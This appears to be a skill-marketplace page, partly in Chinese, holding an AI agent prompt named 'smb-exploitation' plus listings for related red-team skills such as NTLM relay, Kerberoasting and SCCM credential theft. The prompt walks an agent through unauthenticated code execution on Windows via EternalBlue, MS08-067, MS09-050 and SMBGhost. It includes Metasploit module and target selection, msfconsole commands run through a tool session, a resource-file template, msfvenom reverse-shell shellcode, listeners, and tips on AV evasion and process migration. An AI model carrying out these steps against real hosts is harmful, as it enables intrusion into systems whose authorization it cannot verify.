一键导入
smb-exploitation
Exploit remote SMB vulnerabilities for unauthenticated code execution on Windows hosts.
用 Codex 或 Claude 帮你安装 复制这段 Prompt,粘贴到 Codex、Claude 或其他助手里,让它检查 Skill 页面并帮你完成安装。
菜单
Exploit remote SMB vulnerabilities for unauthenticated code execution on Windows hosts.
用 Codex 或 Claude 帮你安装 复制这段 Prompt,粘贴到 Codex、Claude 或其他助手里,让它检查 Skill 页面并帮你完成安装。
基于 SOC 职业分类
Multi-phase penetration test orchestrator. Handles recon, assessment surface mapping, vulnerability chaining, and routes to technique skills for execution. Invoke via /red-run-ctf slash command only.
Exploits misconfigured Active Directory ACLs for privilege escalation. Covers GenericAll, GenericWrite, WriteDACL, WriteOwner, ForceChangePassword, targeted Kerberoasting via SPN manipulation, shadow credentials (msDS-KeyCredentialLink → PKINIT), and AdminSDHolder persistence.
Establishes persistence and exploits weak certificate mapping in AD CS. Covers ESC9 (no security extension), ESC10 (weak certificate mapping), ESC12-15 (YubiHSM, issuance policy, altSecIdentities, application policies), Golden Certificate (forge with stolen CA key), certificate theft (DPAPI/CAPI/CNG), and account persistence via certificate mapping.
Forces remote systems to authenticate back to attacker-controlled listeners and relays captured authentication to escalate privileges or move laterally. Covers authentication coercion (PetitPotam, PrinterBug, DFSCoerce, ShadowCoerce, CheeseOunce), NTLM relay (ntlmrelayx to LDAP/SMB/AD CS/MSSQL), Kerberos relay (krbrelayx, mitm6), and name resolution poisoning (LLMNR/NBNS/WPAD via Responder).
Extracts and cracks Kerberos service tickets (Kerberoasting) and AS-REP hashes (AS-REP Roasting) for offline password recovery.
Enumerates and exploits Microsoft SCCM/MECM (System Center Configuration Manager / Microsoft Endpoint Configuration Manager) infrastructure for credential harvesting, lateral movement, and domain escalation. Covers SCCM enumeration (sccmhunter, SharpSCCM), Network Access Account (NAA) credential extraction (policy request, WMI DPAPI, WMI repository), management point NTLM relay to MSSQL (TAKEOVER1), client push relay (ELEVATE2), PXE boot media credential harvesting (CRED1), SCCM database credential extraction, application deployment for lateral movement, and SCCM share looting.
| name | smb-exploitation |
| description | Exploit remote SMB vulnerabilities for unauthenticated code execution on Windows hosts. |
| keywords | ["MS08-067","MS17-010","EternalBlue","SMBGhost","smb exploit","exploit SMB","exploit this Windows host","smb-vuln","CVE-2008-4250","CVE-2017-0143","CVE-2020-0796","CVE-2009-3103","NetAPI exploit","eternal blue","eternal romance","eternal synergy"] |
| tools | ["Metasploit (msfconsole)","impacket","nmap (for confirmation only)"] |
| opsec | high |
You are helping a penetration tester exploit a confirmed SMB vulnerability for remote code execution. All testing is under explicit written authorization.
Check for ./engagement/ directory. If absent, proceed without logging.
When an engagement directory exists:
[smb-exploitation] Activated → <target> to the screen on activation.engagement/evidence/ with
descriptive filenames (e.g., sqli-users-dump.txt, ssrf-aws-creds.json).This skill covers SMB protocol exploitation — enumeration, authentication attacks, and share access. When you reach the boundary of this scope — whether through completing your methodology or discovering findings outside your domain — STOP.
Do not load or execute another skill. Do not continue past your scope boundary. Instead, return to the orchestrator with:
The orchestrator decides what runs next. Your job is to execute this skill thoroughly and return clean findings.
Stay in methodology. Only use techniques documented in this skill. If you encounter a scenario not covered here, note it and return — do not improvise attacks, write custom exploit code, or apply techniques from other domains. The orchestrator will provide specific guidance or route to a different skill.
Call get_state_summary() from the state MCP server to read current
engagement state. Use it to:
Your return summary must include:
smb-vuln* scripts or equivalentmsfconsole)ip addr show tun0 for
VPN, or appropriate interface)If not already provided by the orchestrator or conversation context, determine:
ip -4 addr show tun0 (or appropriate interface)
to get the listener address| CVE | Vulnerability | Affected OS | Notes |
|---|---|---|---|
| CVE-2008-4250 | MS08-067 | XP SP0-SP3, Server 2003 SP0-SP2, Vista SP0-SP1, Server 2008 pre-SP2 | Most reliable on XP/2003 |
| CVE-2009-3103 | MS09-050 | Vista SP1-SP2, Server 2008 SP1-SP2 | SMBv2 negotiation bug |
| CVE-2017-0143 | MS17-010 (EternalBlue) | XP through Server 2016 (unpatched) | Unstable on XP/2003 32-bit |
| CVE-2020-0796 | SMBGhost | Windows 10 1903/1909, Server v1903/v1909 | SMBv3 compression |
Skip this step if the orchestrator already provided this information.
Metasploit module: exploit/windows/smb/ms08_067_netapi
Preferred for Windows XP and Server 2003. More stable than EternalBlue on these older systems.
Target selection — critical for reliability:
| Target ID | OS |
|---|---|
| 0 | Automatic Targeting |
| 1 | Windows 2000 Universal |
| 2 | Windows XP SP0/SP1 Universal |
| 3 | Windows XP SP2 English (NX) |
| 4 | Windows XP SP3 English (NX) |
| 5 | Windows 2003 SP0 Universal |
| 6 | Windows XP SP2/SP3 English (AlwaysOn NX) |
| 7 | Windows 2003 SP1 English (NO NX) |
| 8 | Windows 2003 SP1 English (NX) |
| 9 | Windows 2003 SP2 English (NO NX) |
| 10 | Windows 2003 SP2 English (NX) |
Decision logic:
show targets for full list)Payload selection:
windows/shell_reverse_tcp — simple, reliable, no staging issueswindows/meterpreter/reverse_tcp — more features but staged
payload can fail on slow/filtered linksMetasploit modules (choose based on target OS):
| Module | Best For | Notes |
|---|---|---|
exploit/windows/smb/ms17_010_eternalblue | Windows 7, Server 2008 R2, Server 2012, 10, Server 2016 (64-bit) | Primary module, most reliable on 64-bit |
exploit/windows/smb/ms17_010_psexec | Windows XP, Server 2003, Vista, 7, 2008 (32 and 64-bit) | Uses named pipes, more stable on 32-bit and older OS |
exploit/windows/smb/ms17_010_eternalblue_win8 | Windows 8, 8.1, Server 2012 | Specific Win8+ handling |
Decision logic:
ms17_010_eternalblue — primary module, highest success ratems17_010_psexec — the
eternalblue module frequently BSODs 32-bit XP. psexec variant uses named
pipes and is far more stable. Requires a valid named pipe — common defaults:
samr, browser, lsarpc, netlogon, srvsvcms17_010_psexecms17_010_eternalblue first, fall
back to ms17_010_eternalblue_win8Named pipe selection for psexec variant:
set NAMEDPIPE samr
If samr fails, cycle through: browser, lsarpc, netlogon, srvsvc.
Null session access increases success — check engagement state for null auth status.
Payload selection:
windows/x64/shell_reverse_tcp or
windows/x64/meterpreter/reverse_tcpwindows/shell_reverse_tcp or
windows/meterpreter/reverse_tcpMetasploit module: exploit/windows/smb/ms09_050_smb2_negotiate_func_index
Narrow target range — only Vista SP1/SP2 and Server 2008 SP1/SP2.
Target selection:
| Target ID | OS |
|---|---|
| 0 | Windows Vista SP1/SP2 and Server 2008 SP1 (x86) |
Only 32-bit targets. If target is 64-bit, this exploit won't work — try MS17-010 instead.
Metasploit module: exploit/windows/smb/cve_2020_0796_smbghost
Very narrow target range — only Windows 10 v1903/v1909 and Server v1903/v1909 with SMBv3.1.1 compression enabled.
Confirmation (before attempting):
# Check for SMBv3.1.1 compression support
nmap -p445 --script smb2-capabilities TARGET_IP
Stability warning: This exploit targets kernel memory and has a moderate BSOD risk. Always warn before launching.
start_process (Preferred)Spawn msfconsole in a persistent PTY via the shell-server MCP. This lets the
agent drive Metasploit interactively — configure the exploit, run it, and
interact with the resulting session through send_command calls.
# 1. Spawn msfconsole
start_process(command="msfconsole -q", label="msfconsole-eternalblue")
# 2. Configure and run (via send_command with expect patterns)
send_command(session_id=..., command="use <MODULE>", expect="msf6 exploit")
send_command(session_id=..., command="set RHOSTS <TARGET_IP>")
send_command(session_id=..., command="set LHOST <ATTACK_IP>")
send_command(session_id=..., command="set LPORT <PORT>")
send_command(session_id=..., command="set TARGET <TARGET_ID>")
send_command(session_id=..., command="set PAYLOAD <PAYLOAD>")
send_command(session_id=..., command="run", timeout=60, expect="session \\d+ opened")
For MS17-010 psexec variant, also set: set NAMEDPIPE samr
For SMBGhost, also set: set PROCESSOR_ARCHITECTURE x64
When Metasploit catches the shell, it lives inside the same PTY session. The
agent interacts with the Meterpreter/cmd session through the same
send_command calls — no port conflict, no DisablePayloadHandler needed.
If start_process is unavailable or msfconsole needs to be run outside the
MCP, generate a resource file:
Template (adapt per exploit selection from Step 2):
cat > temp_smb-exploit.rc << 'RCEOF'
use <MODULE>
set RHOSTS <TARGET_IP>
set LHOST <ATTACK_IP>
set LPORT <PORT>
set TARGET <TARGET_ID>
set PAYLOAD <PAYLOAD>
run
RCEOF
For MS17-010 psexec variant, add:
set NAMEDPIPE samr
For SMBGhost, add:
set PROCESSOR_ARCHITECTURE x64
Execution: Present the resource file contents to the user and instruct:
msfconsole -q -r temp_smb-exploit.rc
If Metasploit is not available, standalone Python exploits exist:
MS17-010 (AutoBlue):
# Generate shellcode
msfvenom -p windows/shell_reverse_tcp LHOST=<ATTACK_IP> LPORT=<PORT> \
-f raw -o sc.bin EXITFUNC=thread
# Run exploit (requires the AutoBlue-MS17-010 repo)
python3 eternalblue_exploit.py <TARGET_IP> sc.bin
MS08-067:
# Generate shellcode
msfvenom -p windows/shell_reverse_tcp LHOST=<ATTACK_IP> LPORT=<PORT> \
EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" \
-f raw -o sc.bin
# Modify ms08_067_exploit.py to include shellcode, then:
python2 ms08_067_exploit.py <TARGET_IP> <OS_TARGET_ID>
For standalone exploits, start a listener first:
nc -lvnp <PORT>
# or
msfconsole -q -x "use multi/handler; set payload windows/shell_reverse_tcp; set LHOST <ATTACK_IP>; set LPORT <PORT>; run"
Note: Standalone exploit scripts may need modification for specific targets. Metasploit modules are more reliable and actively maintained — prefer them when available.
After obtaining a shell, route based on what's needed:
When routing, always pass: target IP, OS version, access level, any credentials found.
target 0 (automatic) if specific target fails.windows/shell_bind_tcp with set RHOST <TARGET_IP>.samr,
browser, lsarpc, netlogon, srvsvc.windows/shell_reverse_tcp instead of
meterpreter — simpler payloads evade basic AV better.ms17_010_psexec or MS08-067.
The primary eternalblue module is unreliable on 32-bit systems.shell_reverse_tcp instead
of shell/reverse_tcp).windows/shell_reverse_tcp (no meterpreter).set AutoRunScript 'post/windows/manage/migrate'
to migrate immediately (meterpreter only).explorer.exe or svchost.exe.Use standalone Python exploits (see Step 3 alternatives). Ensure:
set SMBDirect true/false.